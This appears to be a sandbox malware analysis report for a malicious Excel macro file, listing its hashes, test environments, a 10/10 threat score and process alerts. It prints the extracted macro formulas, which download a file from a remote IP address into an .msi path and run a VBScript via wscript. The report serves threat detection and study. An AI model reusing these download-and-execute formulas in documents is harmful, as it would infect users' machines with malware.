General
-
Target
22524ecc99adf282778bb745f9efe38b
-
Size
6KB
-
Sample
231221-29hjgshgaq
-
MD5
22524ecc99adf282778bb745f9efe38b
-
SHA1
b3d52e7a57fe9ea91ecb8d304dfe3118cade9043
-
SHA256
024d02eecaa32686b99822fa17a628c03c2337efdd5cbb84f120c7a199551b11
-
SHA512
7247d3b7c7ed0c81b5c7c7b43bcbb062b16c10a2de3c1a0ed6980d40a2ddd3e516d44a30be43f280ecb015cf8163cc7e15de3d1542c42874f1f3891c4574b97f
-
SSDEEP
192:NDSHuSxbrA2OmmfRs8UhHFBFYu6b98yiekV+E:N4uyM2w61FY7b98yivJ
Static task
static1
Behavioral task
behavioral1
Sample
22524ecc99adf282778bb745f9efe38b.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
22524ecc99adf282778bb745f9efe38b.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
22524ecc99adf282778bb745f9efe38b
-
Size
6KB
-
MD5
22524ecc99adf282778bb745f9efe38b
-
SHA1
b3d52e7a57fe9ea91ecb8d304dfe3118cade9043
-
SHA256
024d02eecaa32686b99822fa17a628c03c2337efdd5cbb84f120c7a199551b11
-
SHA512
7247d3b7c7ed0c81b5c7c7b43bcbb062b16c10a2de3c1a0ed6980d40a2ddd3e516d44a30be43f280ecb015cf8163cc7e15de3d1542c42874f1f3891c4574b97f
-
SSDEEP
192:NDSHuSxbrA2OmmfRs8UhHFBFYu6b98yiekV+E:N4uyM2w61FY7b98yivJ
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-